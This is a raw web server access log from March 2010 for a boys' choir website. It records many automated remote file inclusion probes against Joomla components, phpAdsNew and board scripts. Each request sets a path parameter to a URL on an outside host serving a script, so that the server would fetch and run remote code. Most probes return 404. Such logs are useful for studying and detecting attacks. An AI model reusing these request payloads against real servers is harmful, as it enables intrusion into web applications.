75.125.21.66 - - [09/Mar/2010:09:05:21 -0800] "GET /logs/access_100212.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:09:05:26 -0800] "GET /logs/access_100116.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:09:05:32 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:09:05:32 -0800] "GET /logs/access_100209.log%20%20///bbs/write_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:09:05:32 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
218.38.243.44 - - [09/Mar/2010:09:05:33 -0800] "GET /logs/access_100205.log/lostpasswd.php?env[include_prefix]=http://www.sithome.com/technote6/data/r0x-id.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:09:05:53 -0800] "GET /logs/access_100210.log%20%20///bbs/write_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.189.206 - - [09/Mar/2010:09:05:53 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.189.206 - - [09/Mar/2010:09:05:53 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.189.206 - - [09/Mar/2010:09:05:53 -0800] "GET /logs/access_100212.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.189.206 - - [09/Mar/2010:09:05:57 -0800] "GET /logs/access_100116.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:09:06:03 -0800] "GET //bbs/write_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:09:06:03 -0800] "GET /logs///bbs/write_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
61.100.181.218 - - [09/Mar/2010:09:06:03 -0800] "GET /logs/access_100209.log///bbs/write_update.php?board_skin_path=http://www.noin9191.com/ams/ammember/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:06:51 -0800] "GET /components/com_performs/performswindow.php?mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:06:51 -0800] "GET /logs/access_100131.log%20%20//components/com_performs/performswindow.php?mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:06:51 -0800] "GET /logs//components/com_performs/performswindow.php?mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:09:07:01 -0800] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:09:07:01 -0800] "GET /logs/access_091229.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:09:07:01 -0800] "GET /kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.189.206 - - [09/Mar/2010:09:07:02 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.189.206 - - [09/Mar/2010:09:07:02 -0800] "GET /logs/access_100212.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.189.206 - - [09/Mar/2010:09:07:02 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.189.206 - - [09/Mar/2010:09:07:11 -0800] "GET /logs/access_100116.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:09:07:24 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:09:07:24 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:09:07:24 -0800] "GET /logs/access_100212.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:09:07:29 -0800] "GET /logs/access_100116.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:09:07:30 -0800] "GET /logs/access_100129.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:07:35 -0800] "GET /components/com_performs/performswindow.php?mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:07:36 -0800] "GET /logs//components/com_performs/performswindow.php?mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:07:36 -0800] "GET /logs/access_100131.log//components/com_performs/performswindow.php?mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:09:07:40 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:09:07:40 -0800] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:09:07:40 -0800] "GET /logs/access_100212.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:09:07:42 -0800] "GET /logs/access_100212.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:09:07:44 -0800] "GET /logs/access_100116.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:08:02 -0800] "GET /logs//components/com_performs/performswindow.php?mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:08:02 -0800] "GET /components/com_performs/performswindow.php?mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:08:02 -0800] "GET /logs/access_100131.log//components/com_performs/performswindow.php?mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:09:08:51 -0800] "GET /phpAdsNew/view.inc.php?phpAds_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/kill-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:09:08:51 -0800] "GET /logs/access_100112.log%20%20/phpAdsNew/view.inc.php?phpAds_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/kill-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
58.150.99.144 - - [09/Mar/2010:09:08:51 -0800] "GET /logs/phpAdsNew/view.inc.php?phpAds_path=http://comweb.webkebi.kr/~eco-max/gboard/lib/kill-9/idxx.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:09:12 -0800] "GET /components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.vinotecnia.es/files/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:09:12 -0800] "GET /logs//components/com_performs/performswindow.php?mosConfig.absolute.path=http://www.vinotecnia.es/files/ts???? HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Konqueror/3.1; Linux 2.4.22-10mdk; X11; i686; fr, fr_FR)" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:09:09:16 -0800] "GET /logs/access_100212.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:09:09:27 -0800] "GET /logs/access_100213.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:09:09:33 -0800] "GET /logs/access_100212.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:09:09:38 -0800] "GET /logs/access_100213.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:09:10:14 -0800] "GET /logs/access_100126.log//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:09:10:50 -0800] "GET /logs/access_100212.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
75.125.21.66 - - [09/Mar/2010:09:10:54 -0800] "GET /logs/access_100213.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:11:04 -0800] "GET /logs/access_100202.log%20%20//components/com_performs/performswindow.php?mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:11:47 -0800] "GET /logs/access_100202.log//components/com_performs/performswindow.php?mosConfig.absolute.path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:09:11:49 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:09:11:49 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:09:11:49 -0800] "GET /logs/access_100131.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:09:11:49 -0800] "GET /logs/access_100129.log/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:09:12:42 -0800] "GET /logs/access_100212.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:12:48 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:12:48 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:12:48 -0800] "GET /logs/access_100205.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
208.76.111.218 - - [09/Mar/2010:09:12:49 -0800] "GET /logs/access_100213.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.241.24.100 - - [09/Mar/2010:09:12:56 -0800] "GET /?_zb_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.241.24.100 - - [09/Mar/2010:09:12:56 -0800] "GET /logs//?_zb_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 1086 "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.241.24.100 - - [09/Mar/2010:09:12:56 -0800] "GET /logs/access_100131.log//?_zb_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.241.24.100 - - [09/Mar/2010:09:13:00 -0800] "GET /?_zb_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 1724 "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.241.24.100 - - [09/Mar/2010:09:13:00 -0800] "GET /logs/access_100131.log//?_zb_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.241.24.100 - - [09/Mar/2010:09:13:01 -0800] "GET /logs//?_zb_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 200 1086 "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:09:13:15 -0800] "GET /logs/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:09:13:15 -0800] "GET /administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:09:13:15 -0800] "GET /logs/access_100228.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.241.24.100 - - [09/Mar/2010:09:13:25 -0800] "GET /logs/access_091111.log//?_zb_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:13:40 -0800] "GET /logs//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:13:41 -0800] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:13:41 -0800] "GET /logs/access_100205.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
92.48.119.75 - - [09/Mar/2010:09:13:46 -0800] "GET /logs/access_100126.log//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=index.php?option=http://art-investments.eu/id1???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
211.241.24.100 - - [09/Mar/2010:09:13:48 -0800] "GET /logs/access_091111.log//?_zb_path=http://www.mendipcastors.co.uk/templates////id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.189.206 - - [09/Mar/2010:09:14:24 -0800] "GET /logs//dministrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.189.206 - - [09/Mar/2010:09:14:24 -0800] "GET /logs/access_100202.log//dministrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.189.206 - - [09/Mar/2010:09:14:24 -0800] "GET /dministrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.189.206 - - [09/Mar/2010:09:15:12 -0800] "GET /logs/access_100129.log//dministrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:15:25 -0800] "GET /logs/access_100117.log%20%20//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
118.168.14.124 - - [09/Mar/2010:09:16:41 -0800] "GET /logs/access_100131.log%20%20/administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://sconlinedesign.com/columbus/heheh.txt? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:17:08 -0800] "GET /logs//twindow_notice.php?shop_this_skin_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:17:08 -0800] "GET /logs/access_091229.log%20%20//twindow_notice.php?shop_this_skin_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:17:08 -0800] "GET /twindow_notice.php?shop_this_skin_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.189.206 - - [09/Mar/2010:09:17:08 -0800] "GET /dministrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.189.206 - - [09/Mar/2010:09:17:08 -0800] "GET /logs//dministrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.189.206 - - [09/Mar/2010:09:17:08 -0800] "GET /logs/access_100202.log//dministrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
213.251.189.206 - - [09/Mar/2010:09:17:29 -0800] "GET /logs/access_100129.log//dministrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://www.import-et-export.fr//components/com_virtuemart/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:17:30 -0800] "GET /logs/access_091213.log%20%20//twindow_notice.php?shop_this_skin_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:09:17:41 -0800] "GET /logs/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:09:17:41 -0800] "GET /logs/access_100131.log/modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
124.49.100.254 - - [09/Mar/2010:09:17:41 -0800] "GET /modules/AllMyGuests/signin.php?_AMGconfig[cfg_serverpath]=http://monet.skku.ac.kr/2005demo/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:17:48 -0800] "GET /logs//twindow_notice.php?shop_this_skin_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:17:48 -0800] "GET /logs/access_091229.log//twindow_notice.php?shop_this_skin_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:17:48 -0800] "GET /twindow_notice.php?shop_this_skin_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:17:59 -0800] "GET /logs/access_091213.log//twindow_notice.php?shop_this_skin_path=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:09:18:02 -0800] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:09:18:02 -0800] "GET /logs/access_100117.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
78.110.50.120 - - [09/Mar/2010:09:18:02 -0800] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.provedorm4net.com.br/portal/.laknat/lc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
216.119.103.16 - - [09/Mar/2010:09:18:15 -0800] "GET /logs/access_100117.log//administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://kopriusa.org/bbs/gn4/bbs/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:09:19:02 -0800] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:09:19:02 -0800] "GET /logs/access_100117.log///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:09:19:02 -0800] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:09:19:05 -0800] "GET /logs///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:09:19:05 -0800] "GET //components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
72.249.104.35 - - [09/Mar/2010:09:19:05 -0800] "GET /logs/access_100117.log%20%20///components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.infolitbang.ristek.go.id/template/.fxcom/fxid1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
210.116.103.118 - - [09/Mar/2010:09:19:11 -0800] "GET /logs/access_100212.log//administrator/components/com_virtuemart/export.php?mosConfig.absolute.path=http://200.199.242.22/images/.ajim/ajim1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.americanboyschoir.com"
